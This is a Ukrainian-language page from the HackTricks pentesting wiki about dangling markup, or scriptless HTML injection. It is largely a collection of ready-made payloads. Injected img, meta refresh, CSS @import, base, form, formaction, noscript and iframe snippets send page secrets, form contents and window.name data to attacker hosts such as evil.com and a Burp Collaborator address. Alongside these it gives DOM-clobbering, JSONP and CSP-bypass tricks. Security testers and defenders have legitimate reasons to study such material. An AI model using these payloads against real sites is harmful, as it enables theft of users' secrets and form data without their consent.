# Dangling Markup - HTML scriptless injection

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

## Резюме

Цю техніку можна використовувати для витягування інформації від користувача, коли **знайдено HTML-ін'єкцію**. Це дуже корисно, якщо ви **не знаходите жодного способу експлуатувати** [**XSS** ](../xss-cross-site-scripting/), але можете **впровадити деякі HTML-теги**.\
Це також корисно, якщо деяка **секретна інформація зберігається у відкритому тексті** в HTML, і ви хочете **екстрактувати** її з клієнта, або якщо ви хочете ввести в оману виконання деякого скрипта.

Кілька технік, згаданих тут, можна використовувати для обходу деякої [**Політики безпеки контенту**](../content-security-policy-csp-bypass/) шляхом екстракції інформації несподіваними способами (HTML-теги, CSS, http-мета-теги, форми, base...).

## Основні застосування

### Вкрадання секретів у відкритому тексті

Якщо ви впровадите `<img src='http://evil.com/log.cgi?` під час завантаження сторінки, жертва надішле вам увесь код між впровадженим тегом `img` і наступною цитатою в коді. Якщо секрет якимось чином знаходиться в цьому фрагменті, ви його вкрадете (ви можете зробити те ж саме, використовуючи подвійні лапки, подивіться, що може бути більш цікавим для використання).

Якщо тег `img` заборонено (наприклад, через CSP), ви також можете використовувати `<meta http-equiv="refresh" content="4; URL='http://evil.com/log.cgi?`
```html
<img src='http://attacker.com/log.php?HTML=
<meta http-equiv="refresh" content='0; url=http://evil.com/log.php?text=
<meta http-equiv="refresh" content='0;URL=ftp://evil.com?a=
```
Зверніть увагу, що **Chrome блокує HTTP URL-адреси** з "<" або "\n" в них, тому ви можете спробувати інші протокольні схеми, такі як "ftp".

Ви також можете зловживати CSS `@import` (надішле весь код, поки не знайде ";")
```html
<style>@import//hackvertor.co.uk?     <--- Injected
<b>steal me!</b>;
```
Ви також можете використовувати **`<table`**:
```html
<table background='//your-collaborator-id.burpcollaborator.net?'
```
Ви також можете вставити тег `<base`. Вся інформація буде надіслана, поки цитата не буде закрита, але це вимагає деякої взаємодії з користувачем (користувач повинен натиснути на деяке посилання, оскільки тег base змінить домен, на який вказує посилання):
```html
<base target='        <--- Injected
steal me'<b>test</b>
```
### Вкрадення форм
```html
<base href='http://evil.com/'>
```
Тоді форми, які надсилають дані на шлях (наприклад, `<form action='update_profile.php'>`), надсилатимуть дані на зловмисний домен.

### Stealing forms 2

Встановіть заголовок форми: `<form action='http://evil.com/log_steal'>`, це перезапише наступний заголовок форми, і всі дані з форми будуть надіслані зловмиснику.

### Stealing forms 3

Кнопка може змінити URL, куди буде надіслана інформація з форми, за допомогою атрибута "formaction":
```html
<button name=xss type=submit formaction='https://google.com'>I get consumed!
```
Зловмисник може використовувати це для крадіжки інформації.

Знайдіть [**приклад цієї атаки в цьому звіті**](https://portswigger.net/research/stealing-passwords-from-infosec-mastodon-without-bypassing-csp).

### Крадіжка відкритих секретів 2

Використовуючи останньо згадану техніку для крадіжки форм (впровадження нового заголовка форми), ви можете потім впровадити нове поле введення:
```html
<input type='hidden' name='review_body' value="
```
і це поле введення міститиме весь вміст між його подвійними лапками та наступними подвійними лапками в HTML. Ця атака поєднує "_**Stealing clear text secrets**_" з "_**Stealing forms2**_".

Ви можете зробити те ж саме, інжектуючи форму та тег `<option>`. Усі дані до закритого `</option>` будуть надіслані:
```html
<form action=http://google.com><input type="submit">Click Me</input><select name=xss><option
```
### Впровадження параметрів форми

Ви можете змінити шлях форми та вставити нові значення, щоб виконати несподівану дію:
```html
<form action='/change_settings.php'>
<input type='hidden' name='invite_user'
value='fredmbogo'>                                        ← Injected lines

<form action="/change_settings.php">                        ← Existing form (ignored by the parser)
...
<input type="text" name="invite_user" value="">             ← Subverted field
...
<input type="hidden" name="xsrf_token" value="12345">
...
</form>
```
### Викрадення секретів у відкритому тексті через noscript

`<noscript></noscript>` Це тег, вміст якого буде інтерпретовано, якщо браузер не підтримує javascript (ви можете увімкнути/вимкнути Javascript у Chrome за адресою [chrome://settings/content/javascript](chrome://settings/content/javascript)).

Спосіб ексфільтрації вмісту веб-сторінки з точки ін'єкції донизу на сайт, контрольований зловмисником, буде ін'єкція цього:
```html
<noscript><form action=http://evil.com><input type=submit style="position:absolute;left:0;top:0;width:100%;height:100%;" type=submit value=""><textarea name=contents></noscript>
```
### Обхід CSP з взаємодією користувача

З цього [дослідження portswiggers](https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup) ви можете дізнатися, що навіть з **найбільш обмежених** середовищ CSP ви все ще можете **екстрагувати дані** з деякою **взаємодією користувача**. У цьому випадку ми будемо використовувати корисне навантаження:
```html
<a href=http://attacker.net/payload.html><font size=100 color=red>You must click me</font></a>
<base target='
```
Зверніть увагу, що ви попросите **жертву** **натиснути на посилання**, яке **перенаправить** його на **payload**, контрольований вами. Також зверніть увагу, що атрибут **`target`** всередині тегу **`base`** міститиме **HTML контент** до наступної одинарної лапки.\
Це призведе до того, що **значення** **`window.name`** при натисканні на посилання буде всім цим **HTML контентом**. Тому, оскільки ви **контролюєте сторінку**, на яку жертва переходить, натискаючи на посилання, ви можете отримати доступ до цього **`window.name`** і **exfiltrate** ці дані:
```html
<script>
if(window.name) {
new Image().src='//your-collaborator-id.burpcollaborator.net?'+encodeURIComponent(window.name);
</script>
```
### Misleading script workflow 1 - HTML namespace attack

Вставте новий тег з id всередині HTML, який перезапише наступний, і з значенням, яке вплине на потік скрипта. У цьому прикладі ви вибираєте, з ким буде поділено інформацію:
```html
<input type='hidden' id='share_with' value='fredmbogo'>     ← Injected markup
...
Share this status update with:                              ← Legitimate optional element of a dialog
<input id='share_with' value=''>

...

function submit_status_update() {
...
request.share_with = document.getElementById('share_with').value;
...
}
```
### Misleading script workflow 2 - Script namespace attack

Створіть змінні всередині простору імен javascript, вставляючи HTML-теги. Потім ця змінна вплине на потік програми:
```html
<img id='is_public'>                                        ← Injected markup

...

// Legitimate application code follows

function retrieve_acls() {
...
if (response.access_mode == AM_PUBLIC)                    ← The subsequent assignment fails in IE
is_public = true;
else
is_public = false;
}

function submit_new_acls() {
...
if (is_public) request.access_mode = AM_PUBLIC;           ← Condition always evaluates to true
...
}
```
### Зловживання JSONP

Якщо ви знайдете інтерфейс JSONP, ви зможете викликати довільну функцію з довільними даними:
```html
<script src='/editor/sharing.js'>:              ← Legitimate script
function set_sharing(public) {
if (public) request.access_mode = AM_PUBLIC;
else request.access_mode = AM_PRIVATE;
...
}

<script src='/search?q=a&call=set_sharing'>:    ← Injected JSONP call
set_sharing({ ... })
```
Або ви можете навіть спробувати виконати деякий javascript:
```html
<script src='/search?q=a&call=alert(1)'></script>
```
### Зловживання Iframe

Дочірній документ має можливість переглядати та змінювати властивість `location` свого батька, навіть у ситуаціях з різними джерелами. Це дозволяє вбудовувати скрипт у **iframe**, який може перенаправити клієнта на довільну сторінку:
```html
<html><head></head><body><script>top.window.location = "https://attacker.com/hacked.html"</script></body></html>
```
Це можна пом'якшити за допомогою чогось на зразок: `sandbox=' allow-scripts allow-top-navigation'`

Iframe також може бути зловжито для витоку чутливої інформації з іншої сторінки **використовуючи атрибут імені iframe**. Це пов'язано з тим, що ви можете створити iframe, який вбудовує сам себе, зловживаючи HTML-ін'єкцією, що робить **чутливу інформацію видимою в атрибуті імені iframe**, а потім отримати це ім'я з початкового iframe і витікати його.
```html
<script>
function cspBypass(win) {
win[0].location = 'about:blank';
setTimeout(()=>alert(win[0].name), 500);
}
</script>

<iframe src="//subdomain1.portswigger-labs.net/bypassing-csp-with-dangling-iframes/target.php?email=%22><iframe name=%27" onload="cspBypass(this.contentWindow)"></iframe>
```
Для отримання додаткової інформації перегляньте [https://portswigger.net/research/bypassing-csp-with-dangling-iframes](https://portswigger.net/research/bypassing-csp-with-dangling-iframes)

### \<meta зловживання

Ви можете використовувати **`meta http-equiv`** для виконання **кількох дій**, таких як встановлення Cookie: `<meta http-equiv="Set-Cookie" Content="SESSID=1">` або виконання перенаправлення (через 5 секунд у цьому випадку): `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />`

Це можна **уникнути** за допомогою **CSP** щодо **http-equiv** ( `Content-Security-Policy: default-src 'self';`, або `Content-Security-Policy: http-equiv 'self';`)

### Новий \<portal HTML тег

Ви можете знайти дуже **цікаве дослідження** про вразливості, які можна експлуатувати, тегу \<portal [тут](https://research.securitum.com/security-analysis-of-portal-element/).\
На момент написання цього тексту вам потрібно увімкнути тег portal у Chrome в `chrome://flags/#enable-portals`, інакше він не працюватиме.
```html
<portal src='https://attacker-server?
```
### HTML Leaks

Не всі способи витоку з'єднання в HTML будуть корисні для Dangling Markup, але іноді це може допомогти. Перевірте їх тут: [https://github.com/cure53/HTTPLeaks/blob/master/leak.html](https://github.com/cure53/HTTPLeaks/blob/master/leak.html)

## SS-Leaks

Це **мікс** між **dangling markup і XS-Leaks**. З одного боку, вразливість дозволяє **впроваджувати HTML** (але не JS) на сторінці **того ж походження**, що й та, яку ми будемо атакувати. З іншого боку, ми не будемо **атакувати** безпосередньо сторінку, на якій можемо впроваджувати HTML, а **іншу сторінку**.

{% content-ref url="ss-leaks.md" %}
[ss-leaks.md](ss-leaks.md)
{% endcontent-ref %}

## XS-Search/XS-Leaks

XS-Search орієнтовані на **екстракцію крос-доменних даних**, зловживаючи **бічними атаками**. Тому це інша техніка, ніж Dangling Markup, однак деякі з технік зловживають включенням HTML тегів (з виконанням JS і без), як [**CSS Injection**](../xs-search/#css-injection) або [**Lazy Load Images**](../xs-search/#image-lazy-loading)**.**

{% content-ref url="../xs-search/" %}
[xs-search](../xs-search/)
{% endcontent-ref %}

## Brute-Force Detection List

{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/dangling_markup.txt" %}

## References

* [https://aswingovind.medium.com/content-spoofing-yes-html-injection-39611d9a4057](https://aswingovind.medium.com/content-spoofing-yes-html-injection-39611d9a4057)
* [http://lcamtuf.coredump.cx/postxss/](http://lcamtuf.coredump.cx/postxss/)
* [http://www.thespanner.co.uk/2011/12/21/html-scriptless-attacks/](http://www.thespanner.co.uk/2011/12/21/html-scriptless-attacks/)
* [https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup](https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup)

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}